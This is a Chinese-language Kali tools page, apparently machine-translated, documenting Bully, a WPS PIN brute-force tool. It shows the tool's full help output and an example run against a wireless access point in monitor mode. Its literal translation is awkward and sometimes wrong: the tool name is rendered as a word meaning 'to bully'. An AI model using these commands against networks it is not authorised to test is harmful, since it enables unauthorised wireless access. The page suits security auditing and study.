<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>kali工具箱</title>
<script src="./static/bootstrap.min.js"></script>
<link rel="stylesheet" href="./static/main.css">
<link rel="stylesheet" href="./static/bootstrap.min.css">
<style type="text/css" id="syntaxhighlighteranchor"></style>
</head>
<main class="main-container ng-scope" ng-view="">
<div class="main receptacle post-view ng-scope">
<article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox="">
<section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml">
<h2>欺负包装说明</h2><p style="text-align: justify;">恶霸是一个新的实现WPS的蛮力攻击，用C语言编写的，是概念上等同于其他方案，因为它利用了（现在是众所周知的）设计缺陷的WPS规范。它拥有超过原来金甲虫代码的几个优点。这些措施包括更少的依赖，提高了内存和CPU的性能，正确处理字节序的，和一个更强大的选项。它可以运行在Linux上，并专门开发的，无论架构的嵌入式Linux系统上运行（OpenWrt的，等等）。 </p><p>欺负提供了异常情况下的检测和处理了一些改进。它已经过测试，对接入点可以从众多的供应商，并与不同的配置，取得很大的成功。 </p><p>资料来源：https://github.com/bdpurcell/bully/ <br> <a href="https://github.com/bdpurcell/bully/" variation="deepblue" target="blank">欺负首页</a> | <a href="http://git.kali.org/gitweb/?p=packages/bully.git;a=summary" variation="deepblue" target="blank">卡利欺负回购</a> </p><ul><li>作者：布莱恩·珀塞尔</li><li>许可：GPLv3的</li></ul><h3>包含在欺负包工具</h3><h5>欺负 - 在WPS暴力攻击的实现，用C写的</h5><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="94e6fbfbe0d4fff5f8fd">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# bully -h<br>
<br>
  usage: bully &lt;options&gt; interface<br>
<br>
  Required arguments:<br>
<br>
      interface      : Wireless interface in monitor mode (root required)<br>
<br>
      -b, --bssid macaddr    : MAC address of the target access point<br>
   Or<br>
      -e, --essid string     : Extended SSID for the access point<br>
<br>
  Optional arguments:<br>
<br>
      -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]<br>
      -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]<br>
      -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]<br>
      -o, --outfile file     : Output file for messages          [stdout]<br>
      -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]<br>
      -s, --source macaddr   : Source (hardware) MAC address      [Probe]<br>
      -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]<br>
      -w, --workdir path     : Location of pin/session files  [~/.bully/]<br>
      -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]<br>
      -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]<br>
      -F, --force            : Force continue in spite of warnings   [No]<br>
      -S, --sequential       : Sequential pins (do not randomize)    [No]<br>
      -T, --test             : Test mode (do not inject any packets) [No]<br>
<br>
  Advanced arguments:<br>
<br>
      -a, --acktime N        : Deprecated/ignored                  [Auto]<br>
      -r, --retries N        : Resend packets N times when not acked  [2]<br>
      -m, --m13time N        : Deprecated/ignored                  [Auto]<br>
      -t, --timeout N        : Deprecated/ignored                  [Auto]<br>
      -1, --pin1delay M,N    : Delay M seconds every Nth nack at M5 [0,1]<br>
      -2, --pin2delay M,N    : Delay M seconds every Nth nack at M7 [5,1]<br>
      -A, --noacks           : Disable ACK check for sent packets    [No]<br>
      -C, --nocheck          : Skip CRC/FCS validation (performance) [No]<br>
      -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]<br>
      -E, --eapfail          : EAP Failure terminate every exchange  [No]<br>
      -L, --lockignore       : Ignore WPS locks reported by the AP   [No]<br>
      -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]<br>
      -N, --nofcs            : Packets don't contain the FCS field [Auto]<br>
      -P, --probe            : Use probe request for nonbeaconing AP [No]<br>
      -R, --radiotap         : Assume radiotap headers are present [Auto]<br>
      -W, --windows7         : Masquerade as a Windows 7 registrar   [No]<br>
      -Z, --suppress         : Suppress packet throttling algorithm  [No]<br>
      -V, --version          : Print version info and exit<br>
      -h, --help             : Display this help information</code><h3>欺负用法示例</h3><p>通过监视器模式界面<b><i>（MON0）攻击</i></b>的无线<b><i>ESSID（-e 6F36E6）：</i></b> </p><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="bac8d5d5cefad1dbd6d3">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# bully -e 6F36E6 mon0<br>
[!] Bully v1.0-22 - WPS vulnerability assessment utility<br>
[X] Unknown frequency '-113135872' reported by interface 'mon0'<br>
[!] Using '00:1f:33:f3:51:13' for the source MAC address<br>
[+] Datalink type set to '127', radiotap headers present<br>
[+] Scanning for beacon from '6F36E6' on channel 'unknown'<br>
[+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56)<br>
[+] Switching interface 'mon0' to channel '8'<br>
[!] Beacon information element indicates WPS is locked<br>
[!] Creating new randomized pin file '/root/.bully/pins'<br>
[+] Index of starting pin number is '0000000'<br>
[+] Last State = 'NoAssoc'   Next pin '54744431'</code><div style="display:none">
<script src="//s11.cnzz.com/z_stat.php?id=1260038378&web_id=1260038378" language="JavaScript"></script>
</div>
</main></body></html>
